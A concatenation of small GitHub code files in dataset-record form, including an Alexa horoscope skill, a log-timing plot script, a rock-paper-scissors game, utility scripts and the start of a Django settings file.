buildResponse(sessionAttributes, buildSpeechletResponse(cardTitle, speechOutput, repromptText, shouldEndSession))\n\n\ndef create_zodiac_attributes(Zodiac):\n return {\"zodiac\": Zodiac}\n\n\n\ndef set_zodiac(intent, session):\n \"\"\" Sets the zodiac of the person and prepares the speech to reply the same to the\n user.\n \"\"\"\n\n \n card_title = \"Zodiac Sign\"\n session_attributes = {}\n should_end_session = False\n\n Zodiac=\"\"\n \n if 'month' in intent['slots']: \n if 'date' in intent['slots'] and intent['slots']['date']['value'].isnumeric():\n birth_month=intent['slots']['month']['value'].lower()\n birth_day=int(intent['slots']['date']['value'])\n \n if (birth_day>=20 and birth_month==\"january\" and birth_day<=31) or (birth_day>=1 and birth_day<=18 and birth_month==\"february\"): \n Zodiac=\"Aquarius\"\n \n elif (birth_day>=19 and birth_month==\"february\"and birth_day<=29) or (birth_day>=1 and birth_day<=20 and birth_month==\"march\"):\n Zodiac=\"Pisces\"\n \n elif (birth_day>=21 and birth_month==\"march\" and birth_day<=31) or (birth_day>=1 and birth_day<=19 and birth_month==\"april\"):\n Zodiac=\"Aries\"\n \n elif (birth_day>=20 and birth_month==\"april\" and birth_day<=30) or (birth_day>=1 and birth_day<=20 and birth_month==\"may\"):\n Zodiac=\"Taurus\"\n \n elif (birth_day>=21 and birth_month==\"may\" and birth_day<=31) or (birth_day>=1 and birth_day<=20 and birth_month==\"june\"):\n Zodiac=\"Gemini\"\n \n elif (birth_day>=21 and birth_month==\"june\" and birth_day<=30) or (birth_day>=1 and birth_day<=22 and birth_month==\"july\"):\n Zodiac=\"Cancer\"\n \n elif (birth_day>=23 and birth_month==\"july\" and birth_day<=31) or (birth_day>=1 and birth_day<=22 and birth_month==\"august\"):\n Zodiac=\"Leo\"\n \n elif (birth_day>=23 and birth_month==\"august\" and birth_day<=31) or (birth_day>=1 and birth_day<=22 and birth_month==\"september\"):\n Zodiac=\"Virgo\"\n \n elif (birth_day>=23 and birth_month==\"september\" and birth_day<=30) or (birth_day>=1 and birth_day<=22 and birth_month==\"october\"):\n Zodiac=\"Libra\"\n \n elif (birth_day>=23 and birth_month==\"october\" and birth_day<=31) or (birth_day>=1 and birth_day<=21 and birth_month==\"november\"):\n Zodiac=\"Scorpio\"\n \n elif (birth_day>=22 and birth_month==\"november\" and birth_day<=30) or (birth_day>=1 and birth_day<=21 and birth_month==\"december\"):\n Zodiac=\"Sagittarius\"\n \n elif (birth_day>=22 and birth_month==\"december\" and birth_day<=31) or (birth_day>=1 and birth_day<=19 and birth_month==\"january\"):\n Zodiac=\"Capricorn\"\n \n if(len(Zodiac)>1):\n session_attributes = create_zodiac_attributes(Zodiac)\n speech_output = \"Your zodiac sign is \" + \\\n Zodiac+ \\\n \". You can ask me information about yourself by saying, \" \\\n \"describe me\"\n reprompt_text = \"You can ask me information about yourself by saying, \" \\\n \"describe me\"\n else:\n speech_output = \"Sorry, i can't tell your zodiac sign because you provided invalid details. \" \\\n \"Please try again. \"\\\n \"Tell me your date of birth, \" \\\n \"for example: three december. \"\n reprompt_text = \"Tell me your date of birth, \" \\\n \"for example: three december. \"\n return buildResponse(session_attributes, buildSpeechletResponse(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef zodiac_information(intent, session):\n \"\"\" \n Provides some funny and ineteresting facts about person.\n \"\"\"\n cardTitle = \"Interesting Information\"\n sessionAttributes = {}\n if session.get('attributes', {}) and \"zodiac\" in session.get('attributes', {}):\n Zodiac = session['attributes']['zodiac']\n zodiac_info=Information[Zodiac]\n speechOutput = zodiac_info+\" That's all. Thank you for trying Horoscope 3.1, please take a moment to rate and review the skill, have a nice day!!\"\n repromptText=None\n shouldEndSession = True\n\n else:\n speechOutput =\"I can't describe you until you tell me your date of birth. \" \\\n \"First, \"\\\n \"tell me your date of birth, \" \\\n \"for example: three december. \"\n\n repromptText = \"Tell me your date of birth \" \\\n \"for example: three december. \"\n shouldEndSession = False\n return buildResponse(sessionAttributes, buildSpeechletResponse(cardTitle, speechOutput, repromptText, shouldEndSession))\n\n\ndef handleSessionEndRequest():\n cardTitle = \"Session Ended\"\n speechOutput = \"Thank you for trying horoscope 3.1 \" \\\n \"Have a nice day! \"\n shouldEndSession = True\n return buildResponse({}, buildSpeechletResponse(cardTitle, speechOutput, None, shouldEndSession)) \n\n# ------------------------------------------------------------------------------\n# --------------------------- Response Builders --------------------------------\n# ------------------------------------------------------------------------------\n\ndef buildSpeechletResponse(title, output, repromptTxt, endSession):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n \n 'card': {\n 'type': 'Simple',\n 'title': title,\n 'content': output\n },\n \n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': repromptTxt\n }\n },\n 'shouldEndSession': endSession\n }\n\n\ndef buildResponse(sessionAttr , speechlet):\n return {\n 'version': '1.0',\n 'sessionAttributes': sessionAttr,\n 'response': speechlet\n }\n\n# ------------------------------------------------------------------------------\n# ---------------------------- Zodiac Information ---------------------------------\n# ------------------------------------------------------------------------------\n\nInformation={\"Aquarius\" : \"your lucky Colors are: light-blue and silver. \\\nyour lucky day is: saturday. \\\nyour lucky numbers are: 4, 7, 11, 22, and 29. \\\nyour best match for marriage and partnership is: leo. \\\nyour strengths are: inventive, humanistic, friendly, altruistic, sociable and reformative. \\\nyour weaknesses are: emotionally detached, scatterbrained, irresponsible, inability to compromise and hot tempered. \\\nyou like: fun with friends, helping others, fighting and intellectual conversation . \\\nyou dislike: being lonely, dull or boring situations, restrictions and incomplete promises. \\\nyou are shy and quiet, but on the other hand you are eccentric and energetic. you are deep thinker and highly intellectual. \",\\\n\n\n\"Pisces\": \"your lucky colors are: mauve, lilac, purple, violet and sea green. \\\nyour lucky day is: thursday. \\\nyour lucky numbers are: 3, 9, 12, 15, 18 and 24. \\\nyour best match for marriage and partnership is: virgo. \\\nyour strengths are: compassionate, artistic, intuitive, gentle, wise, adaptable and imaginative. \\\nyour weaknesses are: oversensitive, indecisive, lazy, escapist and fearful. \\\nyou like: creativity, being alone, sleeping, music, romance and swimming. \\\nyou dislike: rules and restrictions, hardwork, criticism, and being under pressure. \\\nyou are very friendly, you enjoy company of different people. you are selfless, you are always willing to help others, without hoping to get anything back. \",\\\n\n\"Aries\":\"your lucky color is: red. \\\nyour lucky day is: tuesday. \\\nyour lucky numbers are: 1, 8 and 17. \\\nyour best match for marriage and partnership is: libra. \\\nyour strengths are: courageous, determined, confident, enthusiastic, optimistic, honest and passionate. \\\nyour weaknesses are: impatient, moody, short-tempered, impulsive and aggressive. \\\nyou like: loud music, parties, friends, fights, sporting events, being outdoors and action movies. \\\nyou dislike: waiting, being disappointed and being ignored. \\\nyou are natural born leader that knows how to take charge, you are straight-forward and you have zero time for bullshit, you are ultra competitive and wont give up without one hell of a fight. you hate dull and repetitive routines. \" ,\\\n\n \n\"Taurus\":\"your lucky colors are: green and pink. \\\nyour lucky days are: friday and monday. \\\nyour lucky numbers are: 2, 6, 9, 12 and 24. \\\nyour best match for marriage and partnership is: scorpio. \\\nyour strengths are: steady, driven, tenacious, patient, enduring, dedicated, determined and trustworthy. \\\nyour weaknesses are: materialistic, resistant to change, fanatical, indulgent, gluttonous, possessive, stubborn and narrow-minded. \\\nyou like: gardening, cooking, music, romance, high quality clothes, beauty and harmony. \\\nyou dislike: being rushed into making a decision, uncomfortable surroundings, being pestered or annoyed. \\\nyou are practical and well-grounded, you feel the need to always be surrounded by love and beauty, turned to the material world, hedonism, and physical pleasures. you are ready to endure and stick to your choices until you reach the point of personal satisfaction. \",\\\n \n\"Gemini\":\"your lucky colors are: light-green and yellow. \\\nyour lucky day is: wednesday. \\\nyour lucky numbers are: 5, 7, 14 and 23. \\\nyour best match for marriage and partnership is: sagittarius. \\\nyour strengths are: intelligent, adaptable, agile, communicative, and informative. \\\nyour weaknesses are: talkative, exaggerating, deceptive, cunning, superficial and inconsistent. \\\nyou like: music, books, magazines, solving problems, playing games and short trips around the town. \\\nyou dislike: obsessive amounts of seriousness, boredom ,immaturity, repetition, broken promises and dullness .\\\nyou try to avoid conflict and will walk away before things get too heated, you are fiercely loyal friend, ally and lover. your mind always racing with thoughts and ideas. \" ,\\\n\n\"Cancer\":\"your lucky Color is: white. \\\nyour lucky days are: monday and thursday. \\\nyour best match for marriage and partnership is: capricorn. \\\nyour lucky numbers are: 2, 3, 15 and 20. \\\nyour strengths are: tenacious, highly imaginative, loyal, emotional, sympathetic and persuasive. \\\nyour weaknesses are: moody, pessimistic, suspicious, manipulative and insecure. \\\nyou like: money, art, home, helping loved ones and a good meal with friends. \\\nyou dislike: strangers, cruelty, being alone and negative thinking. \\\nyou are deeply intuitive and sentimental. you are very emotional and sensitive, and care deeply about matters of the family and your home. you are sympathetic and attached to people you keep close. you are very loyal and able to empathize with other people's pain and suffering. \",\\\n\n\"Leo\":\"your lucky colors are: gold, yellow and orange. \\\nyour lucky day is: sunday. \\\nyour lucky numbers are: 1, 3, 10 and 19. \\\nyour best match for marriage and partnership is: aquarius. \\\nyour strengths are: creative, passionate, generous, warm-hearted, cheerful and humorous. \\\nyour weaknesses are: arrogant, stubborn, self-centered, lazy and inflexible. \\\nyou like: theater, taking holidays, being admired, expensive things, bright colors and fun with friends. \\\nyou dislike: being ignored, facing difficult reality and not being treated like a king or queen. \\\nyou are natural born leaders. you are dramatic, creative, self-confident, dominant and extremely difficult to resist, able to achieve anything you want to in any area of life you commit to. \",\\\n\n\"Virgo\":\"your lucky colors are: grey, beige and pale-yellow. \\\nyour lucky Day is: wednesday. \\\nyour best match for marriage and partnership is: pisces. \\\nyour lucky numbers are: 5, 14, 15, 23 and 32. \\\nyour strengths are: truthful, loyal, straightforward, analytical, kind, hardworking and practical. \\\nyour weaknesses are: shyness, worry, obsessive and timidity. \\\nyou like: animals, healthy food, books, nature and cleanliness. \\\nyou dislike: rudeness, asking for help and acting as a leader. \\\nyou always pay attention to the smallest details and your deep sense of humanity makes you one of the most careful person. your methodical approach to life ensures that nothing is left to chance, and although you are often tender, your heart might be closed for the outer world. \",\\\n\n\"Libra\":\"your lucky colors are: pink and green. \\\nyour lucky day is: friday. \\\nyour best match for marriage and partnership is: aries. \\\nyour lucky Numbers are: 4, 6, 13, 15 and 24. \\\nyour strengths are: cooperative, diplomatic, gracious, fair-minded and social. \\\nyour weaknesses are: indecisive, unreliable, manipulative and stubborn. \\\nyou like: harmony, gentleness, balance, kindness, parting with others and outdoor activities. \\\nyou dislike: violence, injustice and crowd. \\\nyou are smart enough to learn from your mistakes and you tend to remember everything so that you don’t make the same error of judgement twice. you are also willing to be patient and wait for the right person to come along and wont just settle for the first person that shows interest. \",\\\n\n\"Scorpio\":\"your lucky colors are: scarlet, red and rust. \\\nyour lucky Day is: tuesday. \\\nyour best match for marriage and partnership is: taurus. \\\nyour lucky numbers are: 8, 11, 18 and 22. \\\nyour strengths are: resourceful, brave, passionate, determined and dedicated. \\\nyour weaknesses are: distrusting, jealous, secretive and violent. \\\nyou like: truth, facts, being loyal, being right, mysteries and challenges. \\\nyou dislike: dishonesty, revealing secrets and mind games. \\\nyou are passionate and assertive. you are determined and decisive, and will research until you find out the truth. you are a great leader, always aware of the situation. \\\nyou live to experience and express emotions. you keep secrets, whatever they may be.\",\\\n\n\"Sagittarius\":\"your lucky color is: blue. \\\nyour lucky Day is: thursday. \\\nyour best match for marriage and partnership is: gemini. \\\nyour lucky numbers are: 3, 7, 9, 12 and 21. \\\nyour strengths are: generous, idealistic and great sense of humor. \\\nyour weaknesses are: inability to fulfill promises, lacks patience and lack of tact. \\\nyou like: freedom, travel, philosophy and being outdoors. \\\nyou dislike: dishonesty, pessimism, restrictions and norms. \\\nyou are curious and energetic, you are biggest traveller. your open mind and philosophical view motivates you to wander around the world in search of the meaning of life. \\\nyou are extrovert, optimistic and enthusiastic, and like changes. you can transform your thoughts into concrete actions and you can do anything to achieve your goals. \",\\\n\n\"Capricorn\":\"your lucky colors are: brown and black. \\\nyour lucky day is: saturday. \\\nyour best match for marriage and partnership is: cancer. \\\nyour lucky numbers are: 4, 8, 13 and 22. \\\nyour strengths are: responsible, disciplined, self-control, determined and good managing skills. \\\nyour weaknesses are: pessimistic, greedy, cynical, fearful, ruthless in achieving a goal and rigid. \\\nyou like: family, traditions, music and responsibility. \\\nyou dislike: gossip, laziness, being angry and wasting time. \\\nyou are very serious by nature. you possess an inner state of independence that enables significant progress both in your personal and professional lives. you are master of self-control and have the ability to lead the way, make solid and realistic plans, and manage many people who work for you at any time. you learn from your mistakes and get to the top based solely on your experience and expertise. \"}\n","repo_name":"mohitarora3/Horoscope-3.1","sub_path":"horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":18976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"40201718468","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport os, sys\nimport fnmatch\n\n\ndef client(path):\n index = 0\n result = []\n with open(path, 'r') as f:\n for line in f:\n if 'WARNING' in line and 'Start of request bunch' in line:\n result.append([])\n if 'WARNING' in line and 'Elapsed' in line:\n values = line[line.find('Elapsed')+9:line.find('Elapsed')+23].split(':')\n values2 = values[2].split('.')\n mean = int(values2[0]) + int(values2[1])/1000000\n result[index].append(round(mean * 1000))\n if 'WARNING' in line and 'End of request bunch' in line:\n index += 1\n # print(result)\n return result\n\n\ndef frontend(path):\n result = []\n with open(path, 'r') as f:\n for line in f:\n if 'WARNING - Success GET' in line:\n values = line[line.find('Elapsed') + 9:line.find('Elapsed') + 23].split(':')\n values2 = values[2].split('.')\n mean = int(values2[0]) + int(values2[1]) / 1000000\n result.append(round(mean * 1000))\n # print(result)\n return result\n\n\nclientdata = []\nfrontdata = []\n\nfor file in os.listdir('./Logs'):\n if fnmatch.fnmatch(file, 'client*'):\n clientdata = client(os.path.join(os.path.abspath('.'), 'Logs', file))\n elif fnmatch.fnmatch(file, 'frontend*'):\n frontdata = frontend(os.path.join(os.path.abspath('.'), 'Logs', file))\n\n\n# =======================================================================================================\ndef client_plot():\n properwidth = 12 # Correct if number of requests in client has changed\n index = 0\n # Fill in zeros if some series' length < properwidth\n for series in clientdata:\n print(series)\n if len(series) < properwidth:\n for t in range(0, properwidth-len(series)):\n clientdata[index].append(0)\n index += 1\n\n # Transpose clientdata\n clientdata_tr = [list(row) for row in zip(*clientdata)]\n print(\"===============\")\n for row in clientdata_tr:\n print(row)\n\n\n # задай столбцы\n rawdata = {'req{0}'.format(c) : clientdata_tr[c-1] for c in range(1, len(clientdata_tr)+1)}\n rawdata['req0'] = ['Launch {0}'.format(c) for c in range(0, len(clientdata))]\n\n df = pd.DataFrame(rawdata, columns=['req{0}'.format(c) for c in range(0, len(clientdata_tr)+1)])\n\n\n # Setting the positions and width for the bars\n pos = list(range(len(clientdata)))\n width = 0.025\n\n # Plotting the bars\n fig, ax = plt.subplots(figsize=(10,5))\n\n # Create a bar with pre_score data,\n # in position pos,\n counter = 0\n for x in range(1, len(clientdata_tr)+1):\n plt.bar([p + width*(x-1) for p in pos],\n # using df['mid_score'] data,\n df['req{0}'.format(x)],\n # of width\n width,\n # with alpha 0.5\n alpha=0.5,\n # with color\n color='#F78F1E',\n # with label the second value in first_name\n # label=df['columns'][x])\n label=str(x))\n\n # Set the y axis label\n ax.set_ylabel('Время выполнения запроса (ms)')\n\n # Set the chart's title\n ax.set_title('Клиент')\n\n # Set the position of the x ticks\n ax.set_xticks([p + 1.5 * width for p in pos])\n\n # Set the labels for the x ticks\n ax.set_xticklabels(df['req0'])\n\n # Setting the x-axis and y-axis limits\n plt.xlim(min(pos)-width, max(pos)+width*4)\n plt.ylim([0, max( [max(l) for l in clientdata_tr] )])\n\n # Adding the legend and showing the plot\n # plt.legend(['Pre Score', 'Mid Score', 'Post Score'], loc='upper left')\n plt.grid()\n plt.show()\n\n\ndef frontend_plot():\n fig, ax = plt.subplots(figsize=(10, 5))\n N = len(frontdata)\n x = range(N)\n width = 1 / 1.5\n plt.bar(x, frontdata, width, color='#F78F1E')\n ax.set_ylabel('Время выполнения запроса (ms)')\n ax.set_title('Frontend-узел')\n plt.grid()\n # fig = plt.gcf()\n plt.show()\n\n\nfrontend_plot()\nclient_plot()\n","repo_name":"nmatkheev/SampleRabbitt","sub_path":"time_plot.py","file_name":"time_plot.py","file_ext":"py","file_size_in_byte":4211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"12632131743","text":"import random\r\n\r\ndef play_again():\r\n\toption=input('To continue type [Y/Yes]\\n').lower()\r\n\tif option=='yes' or option=='y':\r\n\t\tperform_operation()\r\n\telse:\r\n\t\tpass\r\n\r\ndef perform_operation():\r\n\tchoice=['rock','paper','scissor']\r\n\tcomputer=choice[random.randint(0,2)]\r\n\tprint('Rock Paper Scissor')\r\n\tplayer=input('Your choice: ').lower()\r\n\twhile player not in choice:\r\n\t\tprint('Choose rock, paper or scissor')\r\n\t\tplayer=input('Your choice: ').lower()\r\n\tprint('Computer choice: ',computer)\r\n\r\n\tif player==computer:\r\n\t\tprint('Draw')\r\n\telif player=='rock' and computer=='paper':\r\n\t\tprint('Computer wins')\r\n\telif player=='rock' and computer=='scissor':\r\n\t\tprint('You win')\r\n\telif player=='paper' and computer=='rock':\r\n\t\tprint('You win')\r\n\telif player=='paper' and computer=='scissor':\r\n\t\tprint('Computer wins')\r\n\telif player=='scissor' and computer=='paper':\r\n\t\tprint('You win')\r\n\telif player=='scissor' and computer=='rock':\r\n\t\tprint('Computer wins')\t\r\n\r\n\tplay_again()\r\n\r\nif __name__ == '__main__':\r\n\tperform_operation()","repo_name":"ndvishruth/Rock-Paper-Scissor","sub_path":"rock.py","file_name":"rock.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39818571006","text":"g = lambda: [*map(int, input().split())]\r\n\r\ndef sieve_of_eratosthenes(N):\r\n isprime = [True] * N\r\n spf = [None] * N\r\n primes = []\r\n for i in range(2, N):\r\n if isprime[i]:\r\n primes.append(i)\r\n spf[i] = i\r\n\r\n j = 0\r\n while (j < len(primes) and\r\n i * primes[j] < N and\r\n primes[j] <= spf[i]):\r\n \r\n isprime[i * primes[j]] = False\r\n spf[i * primes[j]] = primes[j]\r\n j += 1\r\n return primes\r\n\r\nprimes = sieve_of_eratosthenes(1000)\r\nA, B = g()\r\nyt = set(num for num in primes if A <= num <= B)\r\nC, D = g()\r\nyj = set(num for num in primes if C <= num <= D)\r\n\r\nif len(yt) + (len(yt & yj) & 1) > len(yj):\r\n print('yt')\r\nelse:\r\n print('yj')","repo_name":"juwkim/boj","sub_path":"백준/Silver/25632. 소수 부르기 게임/소수 부르기 게임.py","file_name":"소수 부르기 게임.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74895869685","text":"import os\r\n\r\ndef data_split(path, new_file_path, radio):\r\n video_list = [x for x in open(path)]\r\n # if not os.path.exists(new_file_path):\r\n count = 0\r\n new_list = []\r\n for line in video_list:\r\n count += 1\r\n if count % radio == 0:\r\n new_list.append(line)\r\n with open(new_file_path, 'w') as f:\r\n for item in new_list:\r\n f.write(\"%s\" % item)\r\n\r\nif __name__ == '__main__':\r\n radio = 10\r\n path = \"../datasets/lists/kinetics-400/ssd_kinetics_video_trainlist.txt\"\r\n new_file_path = \"../datasets/lists/kinetics-400/ssd_kinetics_video_trainlist_{}of{}.txt\".format(1, radio)\r\n data_split(path, new_file_path, radio)","repo_name":"FingerRec/BE","sub_path":"src/Contrastive/utils/data_process/gen_sub_dataset.py","file_name":"gen_sub_dataset.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"76"} +{"seq_id":"33172581687","text":"import time\nfrom datetime import datetime, timedelta, timezone\n\n\nDT_AWARE = \"%m/%d/%y %I:%M:%S %p %Z\"\nDT_NAIVE = \"%m/%d/%y %I:%M:%S %p\"\n\n\ndef utc_now():\n return datetime.now(timezone.utc).replace(microsecond=0)\n\n\ndef localized_dt_string(dt, use_tz=None):\n if not dt.tzinfo and not use_tz:\n return dt.strftime(DT_NAIVE)\n if not dt.tzinfo:\n return dt.replace(tzinfo=use_tz).strftime(DT_AWARE)\n return (\n dt.astimezone(use_tz).strftime(DT_AWARE)\n if use_tz\n else dt.strftime(DT_AWARE)\n )\n\n\ndef get_local_utcoffset():\n utc_offset = timedelta(seconds=time.localtime().tm_gmtoff)\n return timezone(offset=utc_offset)\n\n\ndef make_tzaware(dt, use_tz=None, localize=True):\n if not use_tz:\n use_tz = get_local_utcoffset()\n return dt.astimezone(use_tz) if localize else dt.replace(tzinfo=use_tz)\n\n\ndef get_gmt_timezone(localtime: str):\n try:\n dt = datetime.fromisoformat(localtime).utcoffset()\n gmt_offset = dt.total_seconds() // 3600\n gmt_timezone = \"{0:+3d}\".format(int(gmt_offset)).lstrip()\n if int(gmt_timezone) > 12 or int(gmt_timezone) < -12:\n return None\n\n return gmt_timezone\n except ValueError:\n return None\n","repo_name":"wiky-avis/movies_auth_service","sub_path":"src/common/datetime_util.py","file_name":"datetime_util.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"35667691123","text":"import numpy as np\nimport random\n\n\nclass Card:\n\n def __init__(self):\n a = [1, 10, 20, 30, 40, 50, 60, 70, 80]\n b = [10, 20, 30, 40, 50, 60, 70, 80, 91]\n card_start = np.zeros((3, 9), dtype=int)\n for i in range(9):\n array_start = np.array(range(a[i], b[i]))\n random.shuffle(array_start)\n new_list = array_start[:3]\n for j in range(3):\n card_start[j, i] = new_list[j]\n # Создадим маску по пять чисел в каждой строке\n mask = np.zeros((3, 9), dtype=int)\n array_mask = np.array(range(9))\n random.shuffle(array_mask)\n new_array = array_mask[:5]\n for i in new_array:\n mask[0, i] = 1\n for i in range(9):\n mask[2, i] = not mask[0, i]\n f = random.choice(new_array)\n mask[2, f] = 1\n array_end = np.array(range(9))\n array_end_f = np.delete(array_end, f)\n random.shuffle(array_end_f)\n new_array = array_end_f[:5]\n for i in new_array:\n mask[1, i] = 1\n # Формируем карточку\n card_end = np.zeros((3, 9), dtype=int)\n for i in range(3):\n for j in range(9):\n if mask[i, j]:\n card_end[i, j] = card_start[i, j]\n\n self.image = card_end\n\n def cprint(self, player):\n \"\"\"\n Выводим на экран карточку конкретного игрока\n :param player:\n :return:\n \"\"\"\n print(f'---Карточка игрока {player.upper()}---')\n for i in range(3):\n for j in range(9):\n if self.image[i, j]:\n if j == 0:\n print(' ', end=' ')\n if self.image[i, j] == -1:\n if j == 0:\n print('*', end=' ')\n else:\n print('**', end=' ')\n else:\n print(str(self.image[i, j]), end=' ')\n else:\n if j == 0:\n print('', end=' ')\n print(' ', end=' ')\n print()\n print('-' * 29)\n\n def creplace(self, num):\n \"\"\"\n Вместо номера в карточке записываем (-1)\n :param num:\n :return:\n \"\"\"\n for i in range(3):\n for j in range(9):\n if self.image[i, j] == num:\n self.image[i, j] = -1\n\n def cmax(self):\n \"\"\"\n Проверяем что максимальное значение числа в карточке не больше нуля\n :return:\n \"\"\"\n return self.image.max() <= 0\n\n def isnum(self, numb):\n \"\"\"\n Проверяем, есть ли выпавший номер (num) в карточке игрока.\n :param num:\n :return:\n \"\"\"\n return numb in self.image\n\n\nif __name__ == '__main__':\n crd = Card()\n player = \"TEST\"\n crd.cprint(player)\n num = random.choice(range(1, 91))\n print(num)\n crd.creplace(num)\n crd.cprint(player)\n print(crd.cmax())\n print(crd.isnum(num))\n","repo_name":"pythonlearningtmn/lesson9loto","sub_path":"class_loto.py","file_name":"class_loto.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23879282673","text":"from marshmallow import ValidationError\n\nfrom schemas.rfq_schema import RfqSchema\n\n\ndef validate_rfq(rfq: str):\n validated_data = None\n error = None\n\n try:\n if rfq.count(\" \") != 3: # 4 entries separated by 3 spaces\n raise ValueError\n\n type_, instrument, size, email = rfq.split()\n\n validated_data = RfqSchema().load(\n {\n \"type\": type_,\n \"instrument\": instrument,\n \"size\": size,\n \"email\": email,\n }\n )\n\n except ValueError:\n error = (\n \"Invalid RFQ format! Please enter a string with \"\n 'this format: \" \"'\n )\n\n except ValidationError as err:\n error = str(err.messages)\n\n return validated_data, error\n","repo_name":"nedevic/InstrumentPriceChecker","sub_path":"validators/rfq.py","file_name":"rfq.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20421007911","text":"import sys, os\nfrom PIL import Image\nimport glob\n\nfGIF = \"animGIF.gif\"\nH = 720\nW = 1270\nn = 1\n# Create the frames\nframes = []\nimages = glob.glob(\"*.jpg\")\n\nfor i in images:\n newImg = Image.open(i)\n# if (len(sys.argv) < 2 and n > 0):\n# newImg = newImg.resize((W, H))\n frames.append(newImg)\n \n# Save into a GIF file that loops forever: duration is in milli-second\nframes[0].save(fGIF, format='GIF', append_images=frames[1:],\n save_all=True, duration=200, loop=0)","repo_name":"lonnieraymccollister/astrotools","sub_path":"gifmaker.py","file_name":"gifmaker.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29868317344","text":"\"\"\" Algoritmo de ordenamiento por selección.\"\"\"\n\n# INICIO\n\n# Inicialización de variables.\ncalif = [None]*6\ncalif_ord = [None]*6\n\n# Entrada de datos:\nfor estudiante in range(6):\n calif[estudiante] = float(input(\"Dame una calificación: \\n\"))\n\n\n# Ordenamiento por selección:\nfor paso in range(6):\n minima = 0\n for estudiante in range(1, 6):\n if (calif[estudiante] < calif[minima]):\n minima = estudiante\n calif_ord[paso] = calif[minima]\n calif[minima] = 11\n# Fin del ordenamiento.\n\n# Se despliega el vector ordenado.\nprint(\"\\nEl orden es : \\n\", calif_ord)\n \n\n# FIN\n","repo_name":"ja12as/Ejercicios-de-python-basicos","sub_path":"Ejemplos Cap 6/Ejemplo6_16.py","file_name":"Ejemplo6_16.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43130633427","text":"# Django settings for src project.\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'opentrackings',\n 'USER': 'otadmin',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n 'OPTIONS': {\"init_command\": \"SET storage_engine=INNODB\"},\n }\n}\n\nimport os\n\nSITE_ROOT = os.path.realpath(os.path.abspath(os.path.join(os.path.realpath(os.path.dirname(__file__)), '..')))\nMEDIA_ROOT = os.path.realpath(os.path.abspath(os.path.join(SITE_ROOT, 'media')))\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'America/New_York'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = False\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = False\n\nSITE_URL = ''\nMEDIA_URL = '%smedia/' % SITE_URL\n\n# Absolute path to the directory that holds media.\nMEDIA_ROOT = '/www/opentrackings/media/'\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\nMEDIA_URL = 'http://opentrackings.com/media/'\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\nADMIN_MEDIA_PREFIX = '/django-admin-media/'\n\nLOGIN_URL = 'account/signin/'\nLOGIN_REDIRECT_URL = \"/\"\nACCOUNT_ACTIVATION_DAYS = 10\n\nOPENID_SREG = {\n \"required\": ['fullname', 'country']\n}\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'ABCDEFGHIJKLMNOPQRST1234567890'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django_authopenid.middleware.OpenIDMiddleware',\n 'django.middleware.transaction.TransactionMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.core.context_processors.request',\n 'django.core.context_processors.auth',\n 'django.core.context_processors.media',\n 'django_authopenid.context_processors.authopenid',\n)\n\nROOT_URLCONF = 'opentrackings.urls'\n\nTEMPLATE_DIRS = (\n os.path.realpath(os.path.abspath(os.path.join(SITE_ROOT, 'opentrackings', 'templates'))),\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 